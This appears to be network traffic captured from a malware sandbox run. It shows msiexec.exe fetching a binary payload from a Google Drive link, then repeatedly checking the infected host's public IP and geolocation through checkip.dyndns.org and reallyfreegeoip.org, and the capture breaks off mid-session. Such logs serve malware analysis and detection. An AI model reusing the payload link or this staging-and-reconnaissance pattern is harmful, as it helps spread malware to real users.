0 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 25, 2025 08:27:40.377614021 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Feb 25, 2025 08:27:40.949151993 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 25 Feb 2025 07:27:40 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: e40c8042fa4dc8f3c0efdba4b3524584
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 25, 2025 08:27:40.973191023 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 25, 2025 08:27:41.130731106 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 25 Feb 2025 07:27:41 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 25a8a12469937b3206e6a426f6b23bc5
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 25, 2025 08:27:42.383109093 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 25, 2025 08:27:42.539824009 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 25 Feb 2025 07:27:42 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d1fc9e021f1471620d6beddc304a6b51
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 1  Source IP: 192.168.2.4  Source Port: 49830  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:43.175154924 CET  Bytes transferred: 127  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Timestamp: Feb 25, 2025 08:27:43.748409033 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:43 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3595a90158435eb321dbbc16b0212c74
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 2  Source IP: 192.168.2.4  Source Port: 49842  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:44.384087086 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:44.989926100 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:44 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 97261df69cf40663abb32f8029c117de
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3  Source IP: 192.168.2.4  Source Port: 49851  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:45.617341042 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:46.190720081 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:46 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ba91a0b33f22cc0ab737061d34dd397b
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4  Source IP: 192.168.2.4  Source Port: 49860  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:46.823997021 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:47.759228945 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:47 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9e7a19a22e351aa79d38cf44d3d65d44
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5  Source IP: 192.168.2.4  Source Port: 49870  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:48.403321981 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:48.987392902 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:48 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 011b3798f37d3194537a32d1bb31b50e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6  Source IP: 192.168.2.4  Source Port: 49881  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:49.625124931 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:50.713785887 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3b041c54dabd2b8c44bf29f4d1a15d3f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7  Source IP: 192.168.2.4  Source Port: 49893  Destination IP: 158.101.44.242  Destination Port: 80  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: Feb 25, 2025 08:27:51.374267101 CET  Bytes transferred: 151  Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Feb 25, 2025 08:27:51.957364082 CET  Bytes transferred: 321  Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 18cf8fc56d1cb7193e9b107e54b21ffe
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0  Source IP: 192.168.2.4  Source Port: 49770  Destination IP: 172.217.18.144  Destination Port: 443  PID: 5660  Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2025-02-25 07:27:35 UTC  Bytes transferred: 216  Direction: OUT
Data:
GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: drive.google.com
Cache-Control: no-cache

Timestamp: 2025-02-25 07:27:35 UTC  Bytes transferred: 1610  Direction: IN
Data:
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 25 Feb 2025 07:27:35 GMT
Location: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-jnv14EMMxQQ47DiGcCZNxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49781 | 142.250.185.193 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:36 UTC | 258 | OUT | GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-02-25 07:27:39 UTC | 5014 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AHMx-iH1Ipor44gGR7byYB2_eWW65AymDWPFfsDUq7PJpegVgOPf8hAcNzcpIOQX7RKA2Jyc
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="OWpmXgRvpIM247.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 276032
Last-Modified: Mon, 24 Feb 2025 09:20:11 GMT
Date: Tue, 25 Feb 2025 07:27:39 GMT
Expires: Tue, 25 Feb 2025 07:27:39 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=KtqWSg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49818 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-02-25 07:27:42 UTC | 858 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:42 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104191
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cttVAsiDdjzIaTj7HOry1otT0EtjpIaGvtP%2FcpJUHI4%2Bf%2Bp3z7RfGGu1HUkaQmZI2rfqaTGd9DOrIQpOIapWLhWYTFd0OjO9BDg%2FDdzvWAKiz9IKn7tH1YWsT%2B7eVteZTk7B8bk2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f9711c6572a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1975&rtt_var=753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441263&cwnd=214&unsent_bytes=0&cid=c7eacf94c1cb7a5c&ts=164&x=0"
2025-02-25 07:27:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:43 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-02-25 07:27:43 UTC | 850 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104192
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sK0pfK01rKXGbCHvnVjPOBDRDTbJLtdwrLTqqKrA2GN5dAawC3oaDD9URRNcZfmmbnaDPX4BSmkI46m1M712wK7DyDNIR5eHQjQc1k7pbVFa%2FmIE2lien5saWbQWr5xqKLATW4E"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f9763c4c1a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1926&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1478481&cwnd=183&unsent_bytes=0&cid=84d1158b47ec076b&ts=136&x=0"
2025-02-25 07:27:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49836 | 104.21.96.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:44 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-02-25 07:27:44 UTC | 860 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104193
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s5akqbuZbEgNTFu7GvJSLkYorXUoq%2BOnO80UU%2FvBYYtx4O6VI94GVAEkwBgZ35OUQJ%2FcVVJ34QHyRNYd4my1yx0J%2BLtSkEyqkTWkbOsqFqvNOxJwnb7St0IuRjD37aoGr%2Bd0oIl%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f97dcbd472a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1922&rtt_var=728&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1494370&cwnd=214&unsent_bytes=0&cid=0d23888189d5cef5&ts=130&x=0"
2025-02-25 07:27:44 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49848 | 104.21.96.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:45 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-02-25 07:27:45 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:45 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104194
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wb36SL5B2iVPRd2w88h0BjANtil9fDr5wFQI3XVONm2kbO8MRs5pIvcEgGT%2FZDor4YGJ8V326OS4q6CLEwCcFapQaQZO9ALDoeJ8WvHGrw2ebADModVd7l40NiX8%2BxgaRqpMHGMY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f9859d5ade9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1587&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1806930&cwnd=233&unsent_bytes=0&cid=18046828db7097d7&ts=128&x=0"
2025-02-25 07:27:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49855 | 104.21.96.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:46 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-02-25 07:27:46 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:46 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104195
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vm%2Bxrwwp8zGJL7TzzowsLx37CbdupoyLB9TPbu6rzxubp2jnJ2hpwU%2Fz4ZlcJvFwvIENvBCjadkjEeP2zB%2FcmhPhcXc0ipF0yo6Y2Pa5Hfibhwsknjy73xTXFa4EiONnZ8%2BsKmlX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f98cfcf342c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1714&rtt_var=663&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1626740&cwnd=223&unsent_bytes=0&cid=83621dd4e283f76f&ts=130&x=0"
2025-02-25 07:27:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49865 | 104.21.96.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:48 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-02-25 07:27:48 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:48 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104197
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Um7NGyJRNPUhzI57v6sKplxH01MMo8W9gC65ClYIp87PJJgKtTfwIOcMjnN0tbdVYwom89SCcpOCHw7Y25jB2FhwAPZ7wj%2BwtNaIdnHoTQA%2BOv8p%2FKkyOYRhldo4W%2FauidrBvoiz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f996e98bde9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1760096&cwnd=233&unsent_bytes=0&cid=4e14516f1f34b805&ts=152&x=0"
2025-02-25 07:27:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49875 | 104.21.96.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-25 07:27:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
